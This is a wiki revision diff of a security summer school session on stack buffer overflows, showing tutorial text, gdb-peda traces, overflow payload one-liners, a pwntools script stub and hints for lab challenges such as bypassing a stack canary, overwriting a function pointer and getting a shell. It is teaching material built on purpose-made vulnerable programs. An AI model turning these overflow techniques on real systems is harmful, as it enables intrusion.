Differences

This shows you the differences between two versions of the page.

--- session:06 [2018/06/28 17:01]
Maria-Elena MIHĂILESCU (25616) [Stack buffer overflows] Add code snippets link
+++ session:06 [2020/07/19 12:49] (current)
@@ Line 1: / Line 1: @@
-= 0x06. Buffer Management
+====== 0x05. Buffer Exploitation ======
-== Slides
+===== Resources =====
-Slides are available [[http://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|here]].
+[[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]]
-[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]].
+[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]]
 [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]].
-== Tutorials
-== Buffers
+/*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/
+===== Tutorials =====
+===== Buffers =====
 A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.
@@ Line 215: / Line 218: @@
 Can you guess how the resulting code will look like, disassembled? Where are we writing to?
-=== Stack buffer overflows
+==== Stack buffer overflows ====
 As we have seen in previous sessions, the stack serves multiple purposes:
@@ Line 405: / Line 408: @@
 </note>
-=== Diverting code execution
+==== Diverting code execution ====
 We attempted to use the wonderful ''gets'' function, but the compiler does not generate it and the man page explicitly says:
@@ Line 419: / Line 422: @@
 However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.
-<code c>
+You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c'').
+<code c buffer_overflow_var.c>
 #include <stdio.h>
 #include <stdlib.h>
@@ Line 446: / Line 451: @@
 <code bash>
-$ python -c "print 'A'*32 + '1337'" | ./divert
+$ python -c "print 'A'*32 + '1337'" | ./buffer_overflow_var
 </code>
-Nothing happened. Let's find out why. We'll save our payload to a file and run ''divert'' under gdb, using the file as input:
+Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input:
 <code bash>
 $ python -c "print 'A'*32 + '1337'" > payload
-$ gdb ./divert
+$ gdb ./buffer_overflow_var
 gdb-peda$ b *0x80484fc
 Breakpoint 1 at 0x80484fc
 gdb-peda$ r < payload
-Starting program: ./divert < payload
+Starting program: ./buffer_overflow_var < payload
 [----------------------------------registers-----------------------------------]
@@ Line 527: / Line 532: @@
 <code>
-$ cat payload | ./divert
+$ cat payload | ./buffer_overflow_var
 Oh dear, you shouldn't be here!
 </code>
@@ Line 534: / Line 539: @@
 <code>
-$ cat payload - | ./divert
+$ cat payload - | ./buffer_overflow_var
 Oh dear, you shouldn't be here!
 date
@@ Line 546: / Line 551: @@
 </note>
-=== Overwriting the stored return address
+==== Overwriting the stored return address ====
 Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.
-<code c>
+You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c'').
+<code c buffer_overflow_ret.c>
 #include <stdio.h>
@@ Line 584: / Line 591: @@
 <code bash>
-$ ./overret
+$ ./buffer_overflow_ret
 Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Nothing to see here
@@ Line 593: / Line 600: @@
 <code bash>
-$ gdb ./overret
+$ gdb ./buffer_overflow_ret
 gdb-peda$ pattc 100
 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
 gdb-peda$ r
-Starting program: /tasks/overret/overret
+Starting program: ./buffer_overflow_ret
 Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
 Nothing to see here
@@ Line 648: / Line 655: @@
 <code bash>
 gdb-peda$ r < payload
-Starting program: /tasks/overret/overret < payload
+Starting program: ./buffer_overflow_ret < payload
 Please leave a message: Nothing to see here
@@ Line 668: / Line 675: @@
 [------------------------------------stack-------------------------------------]
 | 0xffffd620 --> 0x0
-| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("/tasks/overret/overret")
+| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
 | 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 | 0xffffd62c --> 0xffffd644 --> 0x0
@@ Line 690: / Line 697: @@
 <code>
-$ cat payload | ./overret
+$ cat payload | ./buffer_overflow_ret
 Please leave a message: Nothing to see here
 Well done!
@@ Line 702: / Line 709: @@
 </note>
-== Challenges
+===== Challenges =====
 <note important>
@@ Line 721: / Line 728: @@
 Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]].
-=== 01. Parrot
+==== 01. Parrot ====
 Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the "canary" can conclude that stack data has been corrupted throughout the execution of the current function.
@@ Line 727: / Line 734: @@
 We have implemented our very own ''parrot''. Can you avoid it somehow?
-=== 02. Indexing
+<note tip>
+Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''.
+</note>
+<note tip>
+When providing input to a program and wanting to maintain connection to its standard input, run:
+<code>
+cat payload - | ./program
+</code>
+Or, if you have a payload generator program such as ''payload.py'', run:
+<code>
+cat <(python payload.py) - | ./program
+</code>
+</note>
+==== 02. Indexing ====
 More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] come in.
@@ Line 733: / Line 756: @@
 Here's an interactive script to get you started:
-<code python>
+<code python exploit.py>
 #!/usr/bin/env python
 from pwn import *
@@ Line 748: / Line 771: @@
 </code>
-=== 03. Smashthestack Level7
+<note tip>
+Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
+</note>
+<note tip>
+You can inspect the behavior of a program for a given input by doing:
+<code>
+cat payload | strace ./program
+</code>
+That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input.
+</note>
+==== 03. Smashthestack Level7 ====
 Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.
-=== 04. Neighbourly
+<note tip>
+There's an integer overflow + buffer overflow in the program.
+</note>
-Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.
+<note tip>
+What are the four 32 bit values that multiplied by ''4'' give you, let's say, ''256''?
+</note>
-=== 05. Bonus: Birds
+<note tip>
+In order to run a program that receives command line arguments under gdb, you can do the following:
-Time for a more complex challenge. Be patient and don't speed through it.
+<code gdb>
+$ gdb ./main
+gdb$ set args arg1 arg2 arg3
+gdb$ start
+</code>
+</note>
+==== 04. Neighbourly ====
+Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.
+<note tip>
+The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function.
+</note>
-=== 06. Uninitialized
+==== 05. Uninitialized ====
 There's something faulty in the program, and it's **not** an buffer overflow. Provide the proper input to the executable and get a shell.
@@ Line 767: / Line 818: @@
 Do **not** use pwntools for this task.
 </note>
-=== 07: Bonus: Uninitialized 2
+==== 06: Bonus: Uninitialized 2 ====
 There's a small update to the ''uninitialized'' executable and you need to update your solution.
 <note tip>
-Use ''strace'' to understand what's happening differently.
+Use ''ltrace'' to understand what's happening differently.
 </note>
@@ Line 778: / Line 829: @@
 Create a pwntools-based script to solve both the initial executable and the bonus one.
 </note>
+==== 05. Bonus: Birds ====
+Time for a more complex challenge. Be patient and don't speed through it.

Security Summer School

User Tools

Site Tools

Differences

Page Tools